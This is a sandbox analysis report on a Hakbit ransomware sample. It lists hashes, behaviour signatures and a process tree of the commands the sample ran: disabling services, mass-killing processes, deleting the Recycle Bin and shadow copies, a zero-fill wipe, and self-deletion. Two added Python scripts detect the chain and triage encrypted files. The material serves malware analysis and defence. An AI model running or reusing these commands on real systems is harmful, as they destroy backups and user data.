Overview (score 10; Static analysis score 10)

Samples in this submission (sample, platform, score):
- Archive.zip  windows10-1703-x64  1
- Dropper/Berbew.exe  windows10-1703-x64  10
- Dropper/Phorphiex.exe  windows10-1703-x64  10
- out.exe  windows10-1703-x64  10
- RAT/31.exe  windows10-1703-x64  3
- RAT/XClient.exe  windows10-1703-x64  10
- RAT/file.exe  windows10-1703-x64  7
- Ransomware...-2.exe  windows10-1703-x64  10
- Ransomware...01.exe  windows10-1703-x64  10
- Ransomware...lt.exe  windows10-1703-x64  10
- Stealers/Azorult.exe  windows10-1703-x64  10
- Stealers/B...on.exe  windows10-1703-x64  10
- Stealers/Dridex.dll  windows10-1703-x64  10
- Stealers/M..._2.exe  windows10-1703-x64  10
- Stealers/lumma.exe  windows10-1703-x64  10
- Trojan/BetaBot.exe  windows10-1703-x64  10
- Trojan/Smo...er.exe  windows10-1703-x64  10
Sample names are shown truncated as on the page; the full names appear under Behavioral task below. On the page each score badge follows its entry, which is why the numbers were glued to the start of the next line.

Resubmissions (submitted, analysis ID, score):
- 03-09-2024 14:02  240903-rb57sazdqf  10
- 03-09-2024 13:51  240903-q59avszclf  10
- 02-09-2024 19:51  240902-yk8gtsxbpd  10
- 02-09-2024 02:27  240902-cxh7tazflg  10
- 02-09-2024 02:26  240902-cwxc2sygll  10
- 21-06-2024 19:37  240621-yca7cszgnd  10
- 09-06-2024 17:07  240609-vm7rjadd73  10
- 13-05-2024 17:36  240513-v6qblafe3y  10
- 12-05-2024 17:17  240512-vty3zafh5s  10

Analysis
- max time kernel: 135s
- max time network: 85s
- platform: windows10-1703_x64
- resource: win10-20240404-en
- resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 02-09-2024 02:27
Behavioral tasks (task: sample, resource image)
- behavioral1: Archive.zip, win10-20240404-en
- behavioral2: Dropper/Berbew.exe, win10-20240404-en
- behavioral3: Dropper/Phorphiex.exe, win10-20240404-en
- behavioral4: out.exe, win10-20240611-en
- behavioral5: RAT/31.exe, win10-20240404-en
- behavioral6: RAT/XClient.exe, win10-20240404-en
- behavioral7: RAT/file.exe, win10-20240404-en
- behavioral8: Ransomware/Client-2.exe, win10-20240404-en
- behavioral9: Ransomware/criticalupdate01.exe, win10-20240404-en
- behavioral10: Ransomware/default.exe, win10-20240404-en
- behavioral11: Stealers/Azorult.exe, win10-20240404-en
- behavioral12: Stealers/BlackMoon.exe, win10-20240404-en
- behavioral13: Stealers/Dridex.dll, win10-20240404-en
- behavioral14: Stealers/Masslogger/mouse_2.exe, win10-20240611-en
- behavioral15: Stealers/lumma.exe, win10-20240404-en
- behavioral16: Trojan/BetaBot.exe, win10-20240404-en
- behavioral17: Trojan/SmokeLoader.exe, win10-20240404-en

The rest of this page is the report for behavioral8 (Ransomware/Client-2.exe).
General
- Target: Ransomware/Client-2.exe
- Size: 80KB
- MD5: 8152a3d0d76f7e968597f4f834fdfa9d
- SHA1: c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
- SHA256: 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
- SHA512: eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
- SSDEEP: 1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0
Malware Config
- Family: hakbit
- Extracted from: C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt (the ransom note)
Signatures
- Hakbit
  Ransomware which encrypts files using AES, first seen in November 2019.
- Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
  Malicious access or copy of web browser credential store.
- Credentials from Password Stores: Windows Credential Manager (1 TTPs)
  Suspicious access to Credentials History.
- Drops startup file (1 IoCs)
  File created by Client-2.exe: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Launches sc.exe (4 IoCs)
  sc.exe is a Windows utility to control services on the system.
  sc.exe PIDs: 4180, 3772, 3564, 1372
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  PIDs: 7108 PING.EXE, 7008 cmd.exe
- Kills process with taskkill (47 IoCs)
  taskkill.exe PIDs: 4068, 1724, 1996, 4632, 5068, 1208, 1912, 1872, 1396, 4220, 5072, 1512, 716, 4952, 2944, 4720, 596, 96, 312, 1948, 4780, 1964, 5032, 4936, 4316, 1480, 4796, 4120, 5092, 4968, 1120, 4840, 4992, 3920, 4128, 3236, 748, 3900, 1824, 4520, 308, 3276, 3524, 4116, 3572, 3916, 1400
- Opens file in notepad (likely ransom note) (1 IoCs)
  PID 6992 notepad.exe
- Runs ping.exe (1 TTPs, 1 IoCs)
  PID 7108 PING.EXE
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  All 64 hits are from PID 3016 Client-2.exe.
- Suspicious use of AdjustPrivilegeToken (48 IoCs)
  Token SeDebugPrivilege enabled by PID 3016 Client-2.exe, PID 3420 powershell.exe and 46 taskkill.exe instances (PIDs 4520, 3572, 3276, 1912, 4220, 3920, 1120, 1208, 4780, 1948, 596, 4120, 4116, 3900, 5068, 4936, 4796, 3916, 1396, 4992, 2944, 4128, 96, 1824, 4632, 5032, 4840, 1512, 1480, 312, 4068, 3236, 308, 716, 1872, 4968, 1996, 3524, 4720, 748, 1400, 1964, 5072, 4316, 5092, 4952). The one taskkill not in this list is PID 1724, the invocation whose command line lacks the slash before IM (see the process tree).
- Suspicious use of FindShellTrayWindow (1 IoCs)
  PID 3016 Client-2.exe
- Suspicious use of SendNotifyMessage (1 IoCs)
  PID 3016 Client-2.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  PID 3016 Client-2.exe wrote to the memory of each child it spawned; every write is recorded twice. Target PID (sandbox procid_target): 1372 (74), 1920 (75), 3564 (76), 3772 (77), 4180 (78), 4220 (79), 4796 (80), 3524 (81), 3276 (82), 312 (83), 308 (84), 96 (85), 4520 (86), 4128 (87), 3920 (88), 1396 (89), 4632 (90), 1400 (91), 1120 (92), 3916 (93), 1964 (94), 4968 (95), 5068 (96), 4992 (106), 1996 (108), 1724 (110), 4780 (111), 4068 (113), 4840 (115), 5072 (116), 2944 (117), 1824 (118). The list is capped at 64 entries, so the later children in the tree are not shown here.
Processes (image, PID, command line, signatures; indentation shows parent/child)

- C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe (PID 3016)
  "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"
  Signatures: Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory

  - C:\Windows\SYSTEM32\sc.exe (PID 1372) [Launches sc.exe]
    "sc.exe" config SQLTELEMETRY start= disabled
  - C:\Windows\SYSTEM32\cmd.exe (PID 1920)
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  - C:\Windows\SYSTEM32\sc.exe (PID 3564) [Launches sc.exe]
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 3772) [Launches sc.exe]
    "sc.exe" config SQLWriter start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 4180) [Launches sc.exe]
    "sc.exe" config SstpSvc start= disabled

  - C:\Windows\SYSTEM32\taskkill.exe, 47 instances. Each is launched as "taskkill.exe" /IM <image> /F and flagged "Kills process with taskkill" and "Suspicious use of AdjustPrivilegeToken", except where noted. PID: target image, in launch order:
    4220: mspub.exe; 4796: mydesktopqos.exe; 3524: mydesktopservice.exe; 3276: mysqld.exe; 312: sqbcoreservice.exe; 308: firefoxconfig.exe; 96: agntsvc.exe; 4520: thebat.exe; 4128: steam.exe; 3920: encsvc.exe; 1396: excel.exe; 4632: CNTAoSMgr.exe; 1400: sqlwriter.exe; 1120: tbirdconfig.exe; 3916: dbeng50.exe; 1964: thebat64.exe; 4968: ocomm.exe; 5068: infopath.exe; 4992: mbamtray.exe; 1996: zoolz.exe; 1724: thunderbird.exe (launched as "taskkill.exe" IM thunderbird.exe /F, without the slash; flagged "Kills process with taskkill" only); 4780: dbsnmp.exe; 4068: xfssvccon.exe; 4840: mspub.exe; 5072: Ntrtscan.exe; 2944: isqlplussvc.exe; 1824: onenote.exe; 1480: PccNTMon.exe; 1948: msaccess.exe; 3900: outlook.exe; 596: tmlisten.exe; 3572: msftesql.exe; 4936: powerpnt.exe; 5032: mydesktopqos.exe; 3236: visio.exe; 716: mydesktopservice.exe; 4120: winword.exe; 1912: mysqld-nt.exe; 1512: wordpad.exe; 1208: mysqld-opt.exe; 4116: ocautoupds.exe; 5092: ocssd.exe; 748: oracle.exe; 4720: sqlagent.exe; 4316: sqlbrowser.exe; 1872: sqlservr.exe; 4952: synctime.exe

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3420) [Suspicious use of AdjustPrivilegeToken]
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  - C:\Windows\System32\notepad.exe (PID 6992) [Opens file in notepad (likely ransom note)]
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  - C:\Windows\SYSTEM32\cmd.exe (PID 7008) [System Network Configuration Discovery: Internet Connection Discovery]
    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    - C:\Windows\system32\PING.EXE (PID 7108) [System Network Configuration Discovery: Internet Connection Discovery; Runs ping.exe]
      ping 127.0.0.7 -n 3
    - C:\Windows\system32\fsutil.exe (PID 6016)
      fsutil file setZeroData offset=0 length=524288 “%s”
  - C:\Windows\System32\cmd.exe (PID 7024)
    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe
    - C:\Windows\system32\choice.exe (PID 7160)
      choice /C Y /N /D Y /T 3

Notes on the tree:
- The sequence is the usual pre-encryption preparation: disable database and VPN related services with sc.exe, force-kill office, mail, database and backup/AV tray processes so their files are not locked, empty the Recycle Bin, delete volume shadow copies, then drop and open the ransom note and remove the original binary.
- PID 1724 is the only taskkill whose command line lacks the slash before IM ("taskkill.exe" IM thunderbird.exe /F), and it is also the only taskkill absent from the AdjustPrivilegeToken signature, which is consistent with taskkill rejecting its arguments before doing any work. The typo is in the sample's hard-coded command, not in the report.
- The PowerShell one-liner reads $_Delete() where the method call would be $_.Delete(). As written it does not invoke the shadow copy's Delete method, so this step may not have removed any shadow copies; the report records nothing either way, so verify vssadmin list shadows on a real victim before assuming they are gone.
- In the cmd.exe command under PID 7008 the literal “%s” is an unsubstituted format placeholder left by the sample, and ping 127.0.0.7 -n 3 > Nul is a loopback ping used as a delay rather than a connectivity check, so the "Internet Connection Discovery" tag on PID 7008 and 7108 is a generic ping match.
- The self-delete under PID 7024 uses choice /C Y /N /D Y /T 3 as a three-second timer before Del removes Client-2.exe from the Temp directory.
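The chain in the tree is easier to hunt for as a pattern over process-creation events than as individual IoCs, because the PIDs and exact kill list vary between runs. The following detector is an added example, not part of the sandbox report or of the sample: it groups child command lines by parent PID and scores the sequence Hakbit ran here (sc.exe service disabling, a burst of taskkill /IM ... /F, WMI shadow-copy deletion, a loopback ping delay followed by fsutil wipe and del, and a choice-based self-delete). The event records are constructed from the command lines in the tree, with the page's curly quotes normalised to ASCII; the rule names, thresholds and verdict labels are this example's own choices.

```python
"""Score process-creation events for the Hakbit pre-encryption chain (added example)."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed input modelled on the process tree above (not a sandbox or Sysmon export).
SAMPLE_EVENTS = [
    ProcEvent(3016, 1, r"C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"'),
    ProcEvent(1372, 3016, r"C:\Windows\SYSTEM32\sc.exe", '"sc.exe" config SQLTELEMETRY start= disabled'),
    ProcEvent(1920, 3016, r"C:\Windows\SYSTEM32\cmd.exe", '"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin'),
    ProcEvent(3564, 3016, r"C:\Windows\SYSTEM32\sc.exe", '"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled'),
    ProcEvent(3772, 3016, r"C:\Windows\SYSTEM32\sc.exe", '"sc.exe" config SQLWriter start= disabled'),
    ProcEvent(4180, 3016, r"C:\Windows\SYSTEM32\sc.exe", '"sc.exe" config SstpSvc start= disabled'),
    ProcEvent(4220, 3016, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM mspub.exe /F'),
    ProcEvent(3276, 3016, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM mysqld.exe /F'),
    ProcEvent(1396, 3016, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM excel.exe /F'),
    # The missing slash before IM is in the sample's own command line, as recorded in the tree.
    ProcEvent(1724, 3016, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" IM thunderbird.exe /F'),
    ProcEvent(1872, 3016, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM sqlservr.exe /F'),
    ProcEvent(3420, 3016, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              '"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }'),
    ProcEvent(6992, 3016, r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt'),
    ProcEvent(7008, 3016, r"C:\Windows\SYSTEM32\cmd.exe",
              '"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"'),
    ProcEvent(7024, 3016, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe'),
    # Unrelated parent: one taskkill on its own must not trip the verdict.
    ProcEvent(5000, 900, r"C:\Windows\System32\taskkill.exe", '"taskkill.exe" /IM notepad.exe /F'),
]

# One regex per behaviour seen in the tree; rule names are this example's own.
RULES = {
    "service_disable": re.compile(r'\bsc(?:\.exe)?"?\s+config\s+(\S+)\s+start=\s*disabled', re.I),
    "process_kill":    re.compile(r'\btaskkill(?:\.exe)?"?\s+(/?IM)\s+(\S+)\s+/F\b', re.I),
    "shadow_delete":   re.compile(r'Win32_Shadowcopy.*?Delete\s*\(', re.I),
    "recycle_wipe":    re.compile(r'\brd\s+/s\s+/q\s+\S*\$Recycle\.bin', re.I),
    "delay_then_wipe": re.compile(r'\bping\s+127\.0\.0\.\d+\s+-n\s+\d+.*?&.*?fsutil\s+file\s+setZeroData.*?&\s*Del\b', re.I | re.S),
    "self_delete":     re.compile(r'\bchoice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*Del\s+"?([^"]*\.exe)', re.I),
    "ransom_note":     re.compile(r'\bnotepad(?:\.exe)?"?\s+"?(\S+\.txt)', re.I),
}


def classify(ev: ProcEvent) -> list[dict]:
    """Return every rule hit for one event, with the details a responder wants."""
    hits = []
    for name, rx in RULES.items():
        m = rx.search(ev.cmdline)
        if not m:
            continue
        hit = {"rule": name, "pid": ev.pid}
        if name == "service_disable":
            hit["service"] = m.group(1)
        elif name == "process_kill":
            hit["target"] = m.group(2)
            hit["malformed"] = not m.group(1).startswith("/")   # "IM" without the slash
        elif name == "shadow_delete":
            hit["broken"] = re.search(r"\$_\.Delete\s*\(", ev.cmdline) is None  # $_Delete() never calls Delete
        elif name == "delay_then_wipe":
            hit["unsubstituted_placeholder"] = "%s" in ev.cmdline
        elif name == "self_delete":
            hit["deleted_path"] = m.group(1)
        elif name == "ransom_note":
            hit["note_path"] = m.group(1)
        hits.append(hit)
    return hits


def analyse(events: list[ProcEvent]) -> dict[int, dict]:
    """Group hits by parent PID and score the combination; thresholds are illustrative."""
    by_parent: dict[int, list[dict]] = defaultdict(list)
    images = {ev.pid: ev.image for ev in events}
    for ev in events:
        for hit in classify(ev):
            by_parent[ev.ppid].append(hit)
    verdicts = {}
    for ppid, hits in by_parent.items():
        kinds = {h["rule"] for h in hits}
        kills = [h for h in hits if h["rule"] == "process_kill"]
        services = sorted({h["service"] for h in hits if h["rule"] == "service_disable"})
        score = 0
        score += 3 if len(kills) >= 5 else 0          # a burst of kills, not a single admin taskkill
        score += 2 if len(services) >= 3 else 0
        score += 3 if "shadow_delete" in kinds else 0
        score += 2 if "ransom_note" in kinds else 0
        score += 1 if "self_delete" in kinds else 0
        score += 1 if kinds & {"delay_then_wipe", "recycle_wipe"} else 0
        verdicts[ppid] = {
            "image": images.get(ppid, "<unknown>"),
            "score": score,
            "verdict": "ransomware-prep" if score >= 6 else ("suspicious" if score >= 3 else "benign"),
            "kill_targets": sorted(h["target"] for h in kills),
            "malformed_kills": sorted(h["target"] for h in kills if h["malformed"]),
            "disabled_services": services,
            "shadow_delete_broken": any(h.get("broken") for h in hits if h["rule"] == "shadow_delete"),
            "rules": sorted(kinds),
        }
    return verdicts


if __name__ == "__main__":
    for ppid, v in analyse(SAMPLE_EVENTS).items():
        print(ppid, v["image"], v["verdict"], v["score"], v["rules"])
```

Feeding real Sysmon event ID 1 or EDR process-start records only requires mapping their fields onto ProcEvent. The grouping by parent is the point: a single taskkill or sc config from an administrator scores nothing, while the same commands spawned in bulk from one user-writable binary, together with shadow-copy deletion and a ransom note, score well above the threshold. The malformed and broken flags carry the two quirks visible in this run through to the analyst.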
Network

MITRE ATT&CK Enterprise v15
- Credential Access
  - Credentials from Password Stores (2): Credentials from Web Browsers (1), Windows Credential Manager (1)
  - Unsecured Credentials (1): Credentials In Files (1)
Downloads (files written during the run; path, size, hashes)

- (path not shown on the page)
  Filesize: 1.3MB
  MD5: 2a6415dd2d3018147990087747d3bc6d
  SHA1: c235ad2af8f2455ad687443a169e77db2f7841ab
  SHA256: 12ad448d87c9021b51a19abd7c578ed45e21efbf4f45e36e06f95d3fd4480753
  SHA512: 0b2fce7e144f277a6913be498535dfe3f3cc2f0066be929ee0fb35e88099edd16d1354c59f1955bf7b9d12e45ac51c9ba158a6a833a1a4eeb2e10c83efe7f476
- C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\MasterDatastore.xml.energy[[email protected]]
  Filesize: 4KB
  MD5: a8135045089f0a617b8a68598015e313
  SHA1: a6d75798ba689249354bc67d2e14b0e4021d8606
  SHA256: ac9bb0e277bdaa1c8edc6b95af3248f596b57c9ffd09870ade94ead6b02d8dfe
  SHA512: 00659094fdc1b6a3dfac9217f5adef1d73bd5d9cd57088ae161c6c97e5ddfcd951ba6577cd3dd7f890f78bafe2b6e3ac45d49e261b265321e97706fd4f3e2546
- C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\162__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[[email protected]]
  Filesize: 4KB
  MD5: 03b07e985bf72b448c02cb94bb29c53e
  SHA1: 135f884b830d384eaea573db946c15d709787aea
  SHA256: 6ff79671c2fd6f06332241d1881a1363985342e610948c206f45266ee1b28453
  SHA512: e96c0a925ffff852d960192a0a493401b623111a7d303f757722c5b22b8458577efa31b378522ab8b7ed8bbcd969c52ebc25dd74950802673db65d7219a3d912
- C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[[email protected]]
  Filesize: 480B
  MD5: 4c84772e7027f0c4e53aa403e1725aaf
  SHA1: 2aa1a1842afe491024eb53fa6b8c8ee2d11a8e93
  SHA256: 5e074b1238bd7e690f1eeb1e007145c76ca13d27f81c1ee83db99b7faa366ded
  SHA512: 9b39288f03bbce56f200bf1eaff6c612226e99eac73b82776272bf5015583f5280711746b26f7723f60aeae86be56640206844ba55f7f388e8c554fb02cdec22
- C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\619__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml.energy[[email protected]]
  Filesize: 4KB
  MD5: c29aa5f7897f6f285ad25553ad5715e4
  SHA1: 7c69d514399e8721e39109eb41dcf58b53fb026f
  SHA256: b3c173390fcfbfe5c4a4771e5e6b89787605a0ec8a1753a5be5356fdf5d39dd9
  SHA512: 3839ed96ed758aeee45d521f8831a74c7c46f7318a31d23b038c52b24af7c877ed902bf94ffebe55187298d4031136fdbecc508cbd953e35d6747a722bb0a94a
- C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\81__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[[email protected]]
  Filesize: 4KB
  MD5: 9bab832df5b9ba035a563fcb49eec2d0
  SHA1: fd57e542fb47c7a0c56c37bcff71761e8efc61df
  SHA256: 663f8c470e7888b9ed004db3477fdfb65fc96a80e5f1ce95894780d2dbb10725
  SHA512: 88b13e8949f9290b710141bd950862d71056d8148ecd49e938d07db786037bec3da94406a481ee144f16b446152d758b542cd03d25602c652d600dbc311ca532
- C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]
  Filesize: 180KB
  MD5: 7bb8f1dccdca683f8e50c280ccca610f
  SHA1: ea711ca8fcb6405116d1fdb3dcafdebc102412c8
  SHA256: 35a8afaf9b77e9a273f4546e4a1fff2e9cd921cab2c40a03381b334a8f9ea2ed
  SHA512: ea355b3e9a5f37d8cff95bfb28ff84e44c821997f6f680752b7ec6ed3a177f1f9218cbbd7b96123c5c45c1a4c986cab25e8a70d972a5b16b14fc9f8515cf01ec
- (path not shown on the page)
  Filesize: 2KB
  MD5: b49a31b6e3a6771dbfa29b309842ef4f
  SHA1: 6b837a896a3008be212e7a3e297859b06b1d22af
  SHA256: 066845e6408685e957268c1c1bbb2240809c5b5751ae7973235490032eb51d81
  SHA512: 804d493bfafbe4be906dc9bb760839af0dc1e7ff4e15cec1b75c328b982f797ee5910e045d691138bbf8e5bcaba3fcfe354523acd90be3a6180cdae14af19029
- (path not shown on the page)
  Filesize: 1KB
  MD5: c40a4212f7879c8fe4c21ad756d904b5
  SHA1: b58ead9d6286a4408d555dc044bf27631188caa4
  SHA256: 56d060d715f335a47fd950c2492cc358a178b2123f5d34f87dd279e82669352a
  SHA512: 85c8e0a5444a2468ae04c9cc22c54362e7cb64b19879a2f620f76af72b0f9c2d1af9383b1549def92addfecf10686563410c96c5bf5ec4e1690b71cdcd1f971c
- (path not shown on the page)
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
  (The MD5, SHA1 and SHA256 values are those of the single ASCII character "1", so this file's content is the byte 0x31.)
- (path not shown on the page)
  Filesize: 829B
  MD5: 7298cf5272c2f1468d281152ab8a9c22
  SHA1: 951f8c9a885b89f2c6f4a08ce0b2a1189a641a48
  SHA256: f85b0d0277ef8841d05cf5f8d72303984ccfcb48e78b98e629155c9a7a4eb007
  SHA512: 97e9bd5c5ff31797a2c7e0c2b72fd79367abb9f44e99e4a350c827f659eef349ca77e386538e00b56a2adaf38be0190b421985179101b3560aef773b1e92a2c1

Encrypted files keep their full original name and gain a .energy[<contact>] suffix. The contact address inside the brackets is rendered on this copy of the page as [email protected], which is the placeholder that e-mail obfuscation leaves behind, so the real address is not recoverable from this report.
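When scoping an infection from a file listing, the naming convention above is what distinguishes encrypted data from the note and from persistence artefacts. The script below is an added example, not part of the report: it buckets paths into encrypted files, ransom notes, Startup-folder links and everything else, and recovers the original file name from the <name>.<tag>[<contact>] suffix. The listing is constructed from the Downloads, Malware Config and "Drops startup file" entries on this page; because the contact address is redacted on the page, a placeholder address is used. The suffix regex, the note-name set and the return shape are this example's own assumptions.

```python
"""Bucket a file listing into encrypted files, ransom notes and persistence (added example)."""
import re
from typing import Iterable

# Encrypted files keep their full original name and gain ".<tag>[<contact>]".
ENCRYPTED_RX = re.compile(r"^(?P<original>.+)\.(?P<tag>[A-Za-z0-9]+)\[(?P<contact>[^\]]+)\]$")
NOTE_NAMES = {"how_to_decypher_files.txt"}            # ransom note name from the report, lower-cased
STARTUP_MARKER = "\\start menu\\programs\\startup\\"  # per-user Startup folder, lower-cased

# Constructed listing; "contact@example.invalid" stands in for the redacted address.
SAMPLE_PATHS = [
    r"C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\MasterDatastore.xml.energy[contact@example.invalid]",
    r"C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\162__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[contact@example.invalid]",
    r"C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[contact@example.invalid]",
    r"C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk",
    r"C:\Users\Admin\Documents\report.docx",
]


def triage(paths: Iterable[str]) -> dict:
    """Return encrypted / notes / persistence / other buckets plus the distinct tags and contacts."""
    out = {"encrypted": [], "notes": [], "persistence": [], "other": []}
    for p in paths:
        name = p.rsplit("\\", 1)[-1]
        m = ENCRYPTED_RX.match(name)
        if m:
            original = m["original"]                       # name before the appended suffix
            out["encrypted"].append({
                "path": p,
                "original": original,
                "original_ext": original.rsplit(".", 1)[-1].lower() if "." in original else "",
                "tag": m["tag"],
                "contact": m["contact"],
            })
        elif name.lower() in NOTE_NAMES:
            out["notes"].append(p)
        elif STARTUP_MARKER in p.lower() and name.lower().endswith(".lnk"):
            out["persistence"].append(p)
        else:
            out["other"].append(p)
    out["tags"] = sorted({e["tag"] for e in out["encrypted"]})
    out["contacts"] = sorted({e["contact"] for e in out["encrypted"]})
    return out


if __name__ == "__main__":
    result = triage(SAMPLE_PATHS)
    print(len(result["encrypted"]), "encrypted;", result["tags"], result["contacts"])
    print("notes:", result["notes"])
    print("persistence:", result["persistence"])
```

The distinct tag and contact sets are worth reporting on their own: a second tag or address in the same estate usually means a second build or a second intrusion, and the Startup-folder .lnk is the item to pull before the host is reimaged, since its target is not named anywhere in the report.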